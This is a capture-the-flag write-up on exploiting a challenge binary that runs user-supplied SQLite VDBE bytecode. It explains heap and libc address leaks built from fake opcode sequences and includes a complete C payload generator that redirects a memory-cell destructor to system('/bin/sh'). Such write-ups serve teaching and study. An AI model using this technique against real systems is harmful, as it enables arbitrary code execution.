SQLite of Hand (co-authored with mikit)
Did you know that SQLite3 compiles an SQL query into an internal bytecode and executes it with its own bytecode interpreter? (cf. https://www.hwaci.com/sw/sqlite/arch.html) The situation is quite similar to CPython and other interpreters. There have been numerous exploitation challenges targeting bytecode engines, and this challenge is another example of them.
In the challenge, you are given a binary that takes a bytecode sequence and executes it:
char *buf = mmap((void *)MAP_ADDR, 0x2000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
if (buf == MAP_FAILED)
{
perror("mmap");
return 1;
}
if (sqlite3_open("hello.db", &db) != SQLITE_OK)
{
fprintf(stderr, "Cannot open database: %s\n", sqlite3_errmsg(db));
return 1;
}
if (sqlite3_prepare_v2(db, "select 1;", -1, &stmt, NULL) != SQLITE_OK)
{
fprintf(stderr, "Failed to prepare statement: %s\n", sqlite3_errmsg(db));
sqlite3_close(db);
return 1;
}
printf("size> ");
unsigned n = read_int();
if (n >= (N_OPs * SIZE_OP))
{
puts("too long");
return 1;
}
printf("your bytecode> ");
readn(buf, n);
char *target = malloc(N_OPs * SIZE_OP);
memcpy(target, buf, n);
// adhoc: stmt->aOp = target
void **aOp = (void **)((unsigned long long)stmt + 136);
*aOp = target;
sqlite3_step((sqlite3_stmt *)stmt);

Here, stmt is a variable of type sqlite3_stmt *, which is an alias for the internally used struct Vdbe *, and represents a VM object. A Vdbe object is typically produced by compiling a given SQL statement with sqlite3_prepare_XX, and it contains the compiled bytecode, memory cells, the db file handle, and so on. The binary first opens a database named "hello.db" and compiles the SQL query select 1;. The result of the compilation is saved in the stmt variable.
The tricky part comes next. First, the binary reads n bytes into the buffer in the mmapped region at 0x2000000000 and copies them to a separate heap buffer. Then, it overwrites the pointer at stmt+136 with that heap address. Though it is ad hoc, after some investigation you may notice that this offset corresponds to the field aOp in the Vdbe struct, and therefore the assignment is equivalent to stmt->aOp = target. In short, you can replace the opcodes of stmt with an arbitrary opcode sequence.
Let us now look at the internal structure of Vdbe. SQLite's virtual machine is a variant of a register machine: it is equipped with an unbounded number of memory cells (called registers), and each opcode performs a predetermined operation while manipulating registers.
Thus, Vdbe struct holds the information to achieve this virtual machine. The important part of Vdbe and auxiliary structs are as follows:
typedef struct Vdbe Vdbe;
// https://github.com/sqlite/sqlite/blob/9f53d0c8179a3b69f788bd31749fc7c15092be87/src/vdbeInt.h#L447-L517
/*
** Excerpt of the virtual machine object that a sqlite3_stmt * really points
** to. Only the fields relevant to this writeup are shown; everything else is
** elided, so the offsets of the fields below cannot be read off this excerpt.
*/
struct Vdbe {
/** omitted **/
Mem *aMem; /* The memory locations */
Mem **apArg; /* Arguments to currently executing user function */
VdbeCursor **apCsr; /* One element of this array for each open cursor */
Mem *aVar; /* Values for the OP_Variable opcode. */
/* When allocating a new Vdbe object, all of the fields below should be
** initialized to zero or NULL */
/* aOp is the field the challenge binary overwrites through the raw pointer
** write at stmt+136, i.e. the attacker-supplied program is installed here. */
Op *aOp; /* Space to hold the virtual machine's program */
int nOp; /* Number of instructions in the program */
/** omitted **/
}
typedef struct VdbeOp VdbeOp;
// https://github.com/sqlite/sqlite/blob/9f53d0c8179a3b69f788bd31749fc7c15092be87/src/vdbe.h#L54-L93
/*
** Excerpt of a single VDBE instruction: an opcode plus operands p1..p5.
** The payload generator later in this writeup fills these records through
** Op2/Op3/Op4 helpers (presumably thin setters from mylib.c - not shown here).
*/
struct VdbeOp {
u8 opcode; /* What operation to perform */
signed char p4type; /* One of the P4_xxx constants for p4 */
u16 p5; /* Fifth parameter is an unsigned 16-bit integer */
int p1; /* First operand */
int p2; /* Second parameter (often the jump destination) */
int p3; /* The third parameter */
/* p4 is the only operand wide enough to carry a raw pointer; the generator
** passes buffer addresses here together with P4_STATIC / P4_INT64. */
union p4union { /* fourth parameter */
int i; /* Integer value if p4type==P4_INT32 */
void *p; /* Generic pointer */
/* omitted */
} p4;
/* omitted */
};
typedef struct sqlite3_value Mem;
// https://github.com/sqlite/sqlite/blob/9f53d0c8179a3b69f788bd31749fc7c15092be87/src/vdbeInt.h#L225-L248
struct sqlite3_value {
union MemValue {
double r; /* Real value used when MEM_Real is set in flags */
i64 i; /* Integer value used when MEM_Int is set in flags */
int nZero; /* Extra zero bytes when MEM_Zero and MEM_Blob set */
const char *zPType; /* Pointer type when MEM_Term|MEM_Subtype|MEM_Null */
FuncDef *pDef; /* Used only when flags==MEM_Agg */
} u;
char *z; /* String or BLOB value */
int n; /* Number of characters in string value, excluding '\0' */
u16 flags; /* Some combination of MEM_Null, MEM_Str, MEM_Dyn, etc. */
u8 enc; /* SQLITE_UTF8, SQLITE_UTF16BE, SQLITE_UTF16LE */
u8 eSubtype; /* Subtype for this value */
/* ShallowCopy only needs to copy the information above */
sqlite3 *db; /* The associated database connection */
int szMalloc; /* Size of the zMalloc allocation */
u32 uTemp; /* Transient storage for serial_type in OP_MakeRecord */
char *zMalloc; /* Space to hold MEM_Str or MEM_Blob if szMalloc>0 */
void (*xDel)(void*);/* Destructor for Mem.z - only valid if MEM_Dyn */
/* omitted */
};

As we noted above, a Vdbe object has a sequence of memory cells (Mem *aMem) and a sequence of opcodes (Op *aOp). A memory cell object (Mem) is a 56-byte object. It is roughly laid out as follows:
0+---------------+----------------+
| Memory value | String pointer |
16+---------------+----------------+
| not important | not important |
32+---------------+----------------+
| not important | not important |
48+---------------+----------------+
| destructor | |
+---------------+----------------+

There are roughly five kinds of value types in SQLite3, and in this writeup we use integer and string values. The important point here is that the integer value and the string pointer are stored at different offsets within a memory cell, and therefore, even with type confusion, we cannot directly obtain an arbitrary address read/write.
Various opcodes are implemented in SQLite3 (see https://www.sqlite.org/opcode.html for the full list). We here extract important ones
- OP_IntCopy (p1, p2): copies a memory value from one memory cell to another assuming these memory cells have the integer type (no check)
- OP_Concat(p1, p2, p3): string concatenation p3 := p2 + p1. It can trigger libc's malloc.
- OP_AddImm(reg, imm): reg += imm
- OP_String(len, reg, _, str): reg := str
- OP_Goto(_, addr): pc := addr
The challenges of pwning SQLite3 bytecode interpreter are (as far as I know)
- No ArrayBuffer; We cannot do buf[arbitrary_addr] = arbitrary_value easily (no easy arbitrary address write (AAW))
- An illegal OP_IntCopy cannot overwrite the string buffer's address, as the two are located at different offsets within a single memory cell (+0 vs +8).
A rough overview of my exploitation strategy is to leak the heap address and then create a fake Op sequence in the heap.
Since the offset to the Op sequence is always the same, we can jump to the fake Op sequence reliably (100 percent of the time).
Since we have leaked the heap address in the first stage, in the second stage (the fake Op sequence) we can create an opcode that embeds the heap address.
Using this primitive, we can leak the libc address.
Finally, we overwrite the memory cell's destructor function pointer with libc's system, and by using the OP_VCheck opcode we can achieve system("/bin/sh").
#include <sqlite3.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
#include "mylib.c"
#define MAP_ADDR 0x2000000000
#define MEM_Dyn 0x1000
int main()
{
Op *cur;
Op *buf = mmap((void *)MAP_ADDR, 0x10000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
if (buf == MAP_FAILED)
{
perror("mmap");
return 1;
}
printf("buf: %p\n", buf);
Op *target = malloc(0x100 * sizeof(Op));
// **main**
cur = buf;
// aux
i64 value = 0x4142434445;
Op2(cur++, OP_Init, 0, 1);
// leak heap address
// 10: addr of heap
// 11: addr of libc
// 12: addr of stack
int RHEAP = 10;
int RLIBC = 11;
int RSTACK = 12;
int RSQLITE = 13;
char *dummy = (char *)(buf + 0xf0);
Op *fake_op2 = buf + 0x20; // for leaking sqlite
Op *fake_op3 = buf + 0x30; // for leaking libc
Op *fake_op4 = buf + 0x80; // for executing system("/bin/sh")
memcpy(dummy, "/bin/sh\x00", 8);
char *fake_memorycell = dummy + 8;
memcpy(dummy + 8, &dummy, 8);
memcpy(dummy + 16, "\xff\xff\xff\xff", 4);
short flags = MEM_Dyn;
memcpy(dummy + 20, &flags, 2);
short remindar = 0;
memcpy(dummy + 22, &remindar, 2);
dummy += 0x18;
memcpy(dummy, "dummy!!\x00", 8);
// 1. leak heap address
Op3(cur++, OP_IntCopy, 2, RHEAP, 1);
// create leak libc address Ops
Op4(cur++, OP_String, 0x10, 1, 0, fake_op2, P4_STATIC);
Op2(cur++, OP_Pack, RHEAP, 2);
Op3(cur++, OP_Concat, 2, 1, 13);
Op4(cur++, OP_String, 0x800, 1, 0, fake_op2 + 1, P4_STATIC);
Op3(cur++, OP_Concat, 1, 13, 0);
Op2(cur++, OP_Goto, 0, 260); // jump to fake op2
// leak sqlite's lib address
// values is dummy ( to be overwritten above)
cur = fake_op2;
Op4(cur++, OP_Int64, 0, RSQLITE, 0, (u8 *)&value, P4_INT64);
Op2(cur++, OP_AddImm, RSQLITE, -0x104a80);
// GOT(getenv)
Op2(cur++, OP_IntCopy, RSQLITE, 1);
Op2(cur++, OP_AddImm, 1, 1060864);
Op2(cur++, OP_Pack, 1, 2);
Op4(cur++, OP_String, 0x18, 1, 0, (u64)fake_op3 - 0x8, P4_STATIC);
Op3(cur++, OP_Concat, 2, 1, 13);
Op4(cur++, OP_String, 0x900, 1, 0, fake_op3 + 1, P4_STATIC);
Op3(cur++, OP_Concat, 1, 13, 0);
Op2(cur++, OP_Goto, 0, 349); // jump to fake op3
// leak libc's address
cur = fake_op3;
Op4(cur++, OP_Int64, 0, RLIBC, 0, (u8 *)&value, P4_INT64);
Op2(cur++, OP_AddImm, RLIBC, -296864);
int base = 0x26aa0;
int system_offset = 0x58740;
int binsh_offset = 0x1b75aa;
// u (dummy)
Op4(cur++, OP_String, 72, 9, 0, dummy, P4_STATIC);
Op4(cur++, OP_String, 0x10 + 8 /* db */ + 4 /* szMalloc */ + 4 /* uTemp */ + 8 /* zMalloc */, 1, 0, (u64)fake_memorycell, P4_STATIC);
Op3(cur++, OP_Concat, 1, 9, 9);
Op2(cur++, OP_IntCopy, RLIBC, 1);
Op2(cur++, OP_AddImm, 1, system_offset);
Op2(cur++, OP_Pack, 1, 13);
Op3(cur++, OP_Concat, 13, 9, 9);
Op4(cur++, OP_String, 0x900, 1, 0, dummy, P4_STATIC);
Op3(cur++, OP_Concat, 1, 9, 9);
Op2(cur++, OP_VCheck, 0, 2016);
Op2(cur++, OP_ResultRow, 9, 1);
Op2(cur++, OP_Halt, 0, 0);
// save buf to a file named "pwn"
FILE *fp = fopen("pwn", "wb");
fwrite(buf, 0x100 * sizeof(Op), 1, fp);
fclose(fp);
return 0;
}